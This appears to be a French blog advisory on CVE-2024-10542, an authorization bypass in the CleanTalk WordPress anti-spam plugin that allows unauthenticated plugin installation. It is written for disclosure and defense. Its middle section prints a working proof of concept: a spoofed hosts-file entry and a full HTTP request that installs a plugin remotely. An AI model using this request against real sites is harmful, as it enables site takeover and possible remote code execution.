
WordPress Spam protection, AntiSpam, FireWall by CleanTalk Plugin <= 6.43.2 est vulnérable à l'installation non authentifiée et arbitraire de plugins.
Les informations fournies dans ce document concernant CVE-2024-10542 sont destinées uniquement à des fins d'apprentissage et d'éducation. Nous n'encourageons ni n'autorisons l'utilisation de ces informations à des fins nuisibles, y compris, mais sans s'y limiter, l'exploitation, le sabotage de systèmes ou d'autres activités illégales.
Dans un paysage numérique de plus en plus complexe, assurer la sécurité des sites web est primordial pour de nombreux propriétaires de sites. Récemment, deux vulnérabilités critiques ont été découvertes, constituant une menace significative pour les sites WordPress. Ces vulnérabilités affectent le célèbre plugin CleanTalk, qui offre une protection anti-spam, des mesures anti-spam et un pare-feu. Qu'est-ce qui rend cette situation encore plus urgente ? Approfondissons ! Deux vulnérabilités, identifiées comme CVE-2024-10542 et CVE-2024-10781, pourraient permettre à des attaquants non authentifiés d'installer et d'activer des plugins malveillants sur des sites vulnérables. Cela compromet non seulement la réputation du site, mais ouvre également la porte à l'exécution de code à distance. Avec un score CVSS de 9,8 sur 10, il est évident que ces vulnérabilités entrent dans la catégorie très dangereuse. Selon Wordfence, les deux vulnérabilités concernent un problème de contournement d'autorisation qui pourrait permettre à un acteur malveillant d'installer et d'activer des plugins arbitraires. Cela pourrait ensuite ouvrir la voie à une exécution de code à distance si le plugin activé est lui-même vulnérable.
Tout d'abord, les utilisateurs malveillants définiront leur fichier hosts sur leur système d'exploitation :
127.0.0.1 cleantalk.org
après quoi ils envoient une requête comme celle-ci :
POST /?plugin=wp-hooks-finder/index.php HTTP/1.1
Host: wordpress.test
Content-Length: 56
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://wordpress.test
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close
spbc_remote_call_action=install_plugin&plugin_name=apbct
La cybersécurité est une responsabilité partagée par chaque propriétaire de site. En maintenant les plugins à jour et en restant vigilant face aux vulnérabilités potentielles, nous pouvons protéger nos sites contre les attaques malveillantes. Assurez-vous d'avoir mis à jour CleanTalk vers la dernière version et effectuez des vérifications de routine sur les autres plugins pour garantir une sécurité maximale. Souvenez-vous, de petites étapes peuvent prévenir de grands désastres !
Allah, Muhammad SAW, mikemyers, Markdown Monster, ma famille, vous ?